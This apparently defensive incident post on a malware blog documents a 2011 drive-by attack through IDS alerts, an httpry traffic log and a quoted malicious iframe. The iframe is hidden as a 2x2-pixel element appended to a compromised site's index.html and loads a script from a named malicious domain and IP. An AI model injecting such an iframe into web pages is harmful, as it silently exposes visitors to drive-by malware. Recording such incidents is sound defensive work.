Malware and More: Drive by #1

IDS hits..yay

06/14-12:34:57.964011  [**] [1:2012883:2] ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} int.ip:1372 -> 195.43.94.64:80

06/14-12:35:05.076928  [**] [1:2012883:2] ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} int.ip:1372 -> 195.43.94.64:80

06/14-12:35:35.705572  [**] [1:2012883:2] ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} int.ip:1587 -> 195.43.94.64:80

06/14-12:35:48.121428  [**] [1:2012883:2] ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} int.ip:1587 -> 195.43.94.64:80

06/14-12:35:52.852374  [**] [1:2012883:2] ET CURRENT_EVENTS MALVERTISING Malicious Advertizing URL in.cgi [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} int.ip:1587 -> 195.43.94.64:80

httpry

www.markandchappell.com       194.125.149.132 http://www.markandchappell.com/us/index.html

indometastan.in               195.43.94.64    http://indometastan.in/in.cgi?default

Malicious iFrame on the end of index.html

iframe src='http://indometastan.in/in.cgi?default' width='2' height='2' frameborder='0'>

Malware and More

Wednesday, June 15, 2011

Drive by #1

No comments:

Post a Comment

Blog Archive

Followers